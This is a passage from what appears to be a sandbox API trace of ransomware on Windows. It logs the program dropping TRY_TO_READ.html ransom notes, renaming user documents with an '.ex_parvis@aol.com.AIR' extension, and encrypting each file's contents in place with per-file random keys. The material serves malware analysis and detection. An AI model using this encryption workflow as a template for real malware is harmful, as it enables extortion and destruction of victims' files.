"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sk4x4k0\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.921] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978366d0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978366d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9785c830, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0160.921] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c9ad790, ftCreationTime.dwHighDateTime=0x1d4cbf0, ftLastAccessTime.dwLowDateTime=0x26067d90, ftLastAccessTime.dwHighDateTime=0x1d4c606, ftLastWriteTime.dwLowDateTime=0x26067d90, ftLastWriteTime.dwHighDateTime=0x1d4c606, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vpoDWivY35", cAlternateFileName="VPODWI~1")) returned 1 [0160.921] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.923] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed90080, ftCreationTime.dwHighDateTime=0x1d4cdee, ftLastAccessTime.dwLowDateTime=0x22ce4b90, ftLastAccessTime.dwHighDateTime=0x1d4d370, ftLastWriteTime.dwLowDateTime=0x22ce4b90, ftLastWriteTime.dwHighDateTime=0x1d4d370, nFileSizeHigh=0x0, nFileSizeLow=0x2ed7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yqQjOn8CUyXlRK4OZ8.ods", cAlternateFileName="YQQJON~1.ODS")) returned 1 [0160.923] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab6cd7c0, ftCreationTime.dwHighDateTime=0x1d5913c, ftLastAccessTime.dwLowDateTime=0xc89be8e0, ftLastAccessTime.dwHighDateTime=0x1d55d52, ftLastWriteTime.dwLowDateTime=0xc89be8e0, ftLastWriteTime.dwHighDateTime=0x1d55d52, nFileSizeHigh=0x0, nFileSizeLow=0x53d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z48Ak67K-5P.xlsx", cAlternateFileName="Z48AK6~1.XLS")) returned 1 [0160.923] FindNextFileW (in: hFindFile=0x35e318, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab6cd7c0, ftCreationTime.dwHighDateTime=0x1d5913c, ftLastAccessTime.dwLowDateTime=0xc89be8e0, ftLastAccessTime.dwHighDateTime=0x1d55d52, ftLastWriteTime.dwLowDateTime=0xc89be8e0, ftLastWriteTime.dwHighDateTime=0x1d55d52, nFileSizeHigh=0x0, nFileSizeLow=0x53d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z48Ak67K-5P.xlsx", cAlternateFileName="Z48AK6~1.XLS")) returned 0 [0160.923] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0160.923] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0160.923] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383db0 [0160.923] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.923] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.923] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx", dwFileAttributes=0x80) returned 1 [0160.923] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx") returned 57 [0160.923] GetProcessHeap () returned 0x2e0000 [0160.923] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x30a498 [0160.923] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx" [0160.923] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.923] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z48ak67k-5p.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z48ak67k-5p.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.928] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z48Ak67K-5P.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z48ak67k-5p.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.928] GetProcessHeap () returned 0x2e0000 [0160.928] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0160.928] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=21456) returned 1 [0160.928] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x53d0 [0160.928] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.928] GetProcessHeap () returned 0x2e0000 [0160.928] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.928] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.928] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.929] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.929] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.929] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x53d0) returned 0x3ac410 [0160.930] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x53d0) returned 0x3b17e8 [0160.930] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.930] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x53d0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x53d0, lpOverlapped=0x0) returned 1 [0160.930] SetFilePointer (in: hFile=0x394, lDistanceToMove=-21456, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.931] WriteFile (in: hFile=0x394, lpBuffer=0x3b17e8*, nNumberOfBytesToWrite=0x53d0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b17e8*, lpNumberOfBytesWritten=0x2acf9c8*=0x53d0, lpOverlapped=0x0) returned 1 [0160.932] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.932] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.932] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods", dwFileAttributes=0x80) returned 1 [0160.932] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods") returned 63 [0160.932] GetProcessHeap () returned 0x2e0000 [0160.932] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.932] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods" [0160.933] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods.12781717671972518758.ex_parvis@aol.com.AIR" [0160.933] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqqjon8cuyxlrk4oz8.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqqjon8cuyxlrk4oz8.ods.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.935] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yqQjOn8CUyXlRK4OZ8.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yqqjon8cuyxlrk4oz8.ods.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.935] GetProcessHeap () returned 0x2e0000 [0160.936] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.936] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=11991) returned 1 [0160.936] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2ed7 [0160.936] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.936] GetProcessHeap () returned 0x2e0000 [0160.936] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.936] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.936] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.937] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.937] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.937] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ed7) returned 0x3ac410 [0160.937] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2ed7) returned 0x3af2f0 [0160.937] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.937] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x2ed7, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x2ed7, lpOverlapped=0x0) returned 1 [0160.937] SetFilePointer (in: hFile=0x394, lDistanceToMove=-11991, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.937] WriteFile (in: hFile=0x394, lpBuffer=0x3af2f0*, nNumberOfBytesToWrite=0x2ed7, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af2f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x2ed7, lpOverlapped=0x0) returned 1 [0160.938] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.938] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.938] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx", dwFileAttributes=0x80) returned 1 [0160.938] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx") returned 54 [0160.938] GetProcessHeap () returned 0x2e0000 [0160.938] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd2) returned 0x30a498 [0160.938] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx" [0160.938] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.938] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbw0t07_.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.940] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qbw0t07_.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.940] GetProcessHeap () returned 0x2e0000 [0160.941] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0160.941] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=65657) returned 1 [0160.941] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10079 [0160.941] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.941] GetProcessHeap () returned 0x2e0000 [0160.941] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.941] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.941] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.942] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.942] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.942] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10079) returned 0x3ac410 [0160.942] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10079) returned 0x30d0048 [0160.943] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.943] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x10079, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x10079, lpOverlapped=0x0) returned 1 [0160.944] SetFilePointer (in: hFile=0x394, lDistanceToMove=-65657, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.944] WriteFile (in: hFile=0x394, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x10079, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x10079, lpOverlapped=0x0) returned 1 [0160.945] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.945] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.945] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx", dwFileAttributes=0x80) returned 1 [0160.945] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx") returned 51 [0160.945] GetProcessHeap () returned 0x2e0000 [0160.945] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0160.945] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx" [0160.945] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx.12781717671972518758.ex_parvis@aol.com.AIR" [0160.945] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pv7rp.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pv7rp.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.947] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pv7RP.pptx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pv7rp.pptx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0160.947] GetProcessHeap () returned 0x2e0000 [0160.947] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.947] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=15797) returned 1 [0160.947] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x3db5 [0160.947] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.948] GetProcessHeap () returned 0x2e0000 [0160.948] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.948] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.948] WriteFile (in: hFile=0x394, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.948] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.949] WriteFile (in: hFile=0x394, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.949] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3db5) returned 0x3ac410 [0160.949] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x3db5) returned 0x3b01d0 [0160.949] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.949] ReadFile (in: hFile=0x394, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x3db5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x3db5, lpOverlapped=0x0) returned 1 [0160.949] SetFilePointer (in: hFile=0x394, lDistanceToMove=-15797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.949] WriteFile (in: hFile=0x394, lpBuffer=0x3b01d0*, nNumberOfBytesToWrite=0x3db5, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b01d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x3db5, lpOverlapped=0x0) returned 1 [0160.949] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.949] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.949] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx", dwFileAttributes=0x80) returned 1 [0160.950] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OV-wsJ1ouPCLOQXSQ.pptx") returned 63 [0160.950] GetProcessHeap () returned 0x2e0000 [0160.950] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.950] lstrcpyW (in: lpString1=0x3a7428, 